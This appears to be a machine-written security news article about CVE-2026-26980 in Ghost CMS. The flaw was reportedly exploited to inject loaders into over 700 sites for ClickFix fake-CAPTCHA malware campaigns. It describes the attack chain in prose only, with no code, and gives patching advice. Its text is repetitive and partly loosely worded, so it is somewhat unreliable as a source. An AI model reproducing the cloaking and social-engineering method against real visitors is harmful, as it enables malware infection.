Ethical Hacking News
Thieves have been exploiting a critical security flaw in the popular content management system Ghost CMS to hijack over 700 websites, with the ultimate goal of fueling ClickFix attacks that trick users into installing malware. The vulnerability has been identified as CVE-2026-26980 and is one of the most severe vulnerabilities disclosed recently. In this article, we will delve deeper into the details surrounding this vulnerability and provide recommendations for Ghost CMS users to protect themselves against these malicious attacks.
More than 700 websites have been hijacked by threat actors exploiting the Ghost CMS vulnerability. The vulnerability allows malicious code to be injected at the bottom of pages, serving as a two-stage loader that retrieves main payload at runtime from an external domain. Threat actors use this technique to trick visitors into performing a fake CAPTCHA verification process as part of the "ClickFix" attack. The attack is designed to only serve real victims with actual payload while security scanners and crawlers see benign web pages. The vulnerability has been exploited by threat actors to obtain Admin API Key without authorization, allowing for bulk tampering with articles.
Thieves, hackers, and cyber-terrorists have been using a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript code and hijack more than 700 websites for use in fueling click fix attacks. This attack, known as the "Ghost CMS Vulnerability Exploitation," has brought several large-scale poisoning campaigns weaponizing the vulnerability to gain access to targeted websites.
According to QiAnXin XLab, a Chinese security vendor, this vulnerability has been exploited by threat actors to "obtain the target site's Admin API Key without authorization and then use the Ghost Admin API to tamper with articles in bulk." This allows malicious code to be injected at the bottom of pages, serving as a two-stage loader that retrieves the main payload at runtime from an external domain.
The threat actors have used this technique to hijack several prominent websites spanning universities, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology sectors. The attackers' ultimate goal was to trick visitors into performing a fake CAPTCHA verification process as part of the "ClickFix" attack.
However, this technique allows only real victims to be served the actual payload while security scanners and crawlers will see a benign web page. To do so, the threat actors have used a cloaking script powered by Adspect, which collects various fingerprint information from users' browsers and uploads it to a server for actions such as redirection, popups, and downloads.
The idea behind using this cloaking script is to ensure that only real victims are served the actual payload while security scanners and crawlers will see a benign web page. The script also supports 19 different commands to run arbitrary JavaScript code and facilitate remote control of the victim's browser.
Site visitors deemed as intended targets are ultimately served a fake CAPTCHA verification page within an iframe HTML element, which triggers the ClickFix attack. As part of this attack, they are instructed to copy and paste a Base64-encoded command into the Windows Run dialog. The command serves as a dropper for delivering a ZIP archive that extracts from it a Windows batch script, which runs on the victim's system.
The end goal of the attack is to drop a Windows executable. In one instance, the executable is a PuTTY client with a valid code-signing certificate, while in other instances, it is an Inno Setup installer for an Electron application that serves as a modified version of the open-source Grape desktop client.
The Ghost CMS vulnerability has been identified as CVE-2026-26980 and has a CVSS score of 9.4. This makes it one of the most severe vulnerabilities disclosed recently. The security flaw was discovered by Anthropic using Claude, but it was addressed in February 2026 in version 6.19.1.
In response to this vulnerability, Ghost CMS users are advised to upgrade their instances to the latest version and clean up compromised sites to prevent potential compromise. It is also recommended that legitimate websites that have been compromised notify users who may have visited those sites during the contamination period for further protection against ClickFix attacks.
The discovery of this vulnerability highlights the importance of keeping software updated and being vigilant about security threats. As cybersecurity threats continue to evolve, it is crucial that we stay informed and take proactive steps to protect ourselves from these threats. The Ghost CMS vulnerability serves as a reminder to be cautious when using vulnerable software and to prioritize our cybersecurity.
Related Information:
https://www.ethicalhackingnews.com/articles/Ghosts-in-the-Machine-The-Ghost-CMS-Vulnerability-Exploited-for-ClickFix-Attacks-ehn.shtml
https://thehackernews.com/2026/05/ghost-cms-cve-2026-26980-exploited-to.html
https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/
https://nvd.nist.gov/vuln/detail/CVE-2026-26980
https://www.cvedetails.com/cve/CVE-2026-26980/
Published: Mon May 25 07:56:02 2026 by llama3.2 3B Q4_K_M
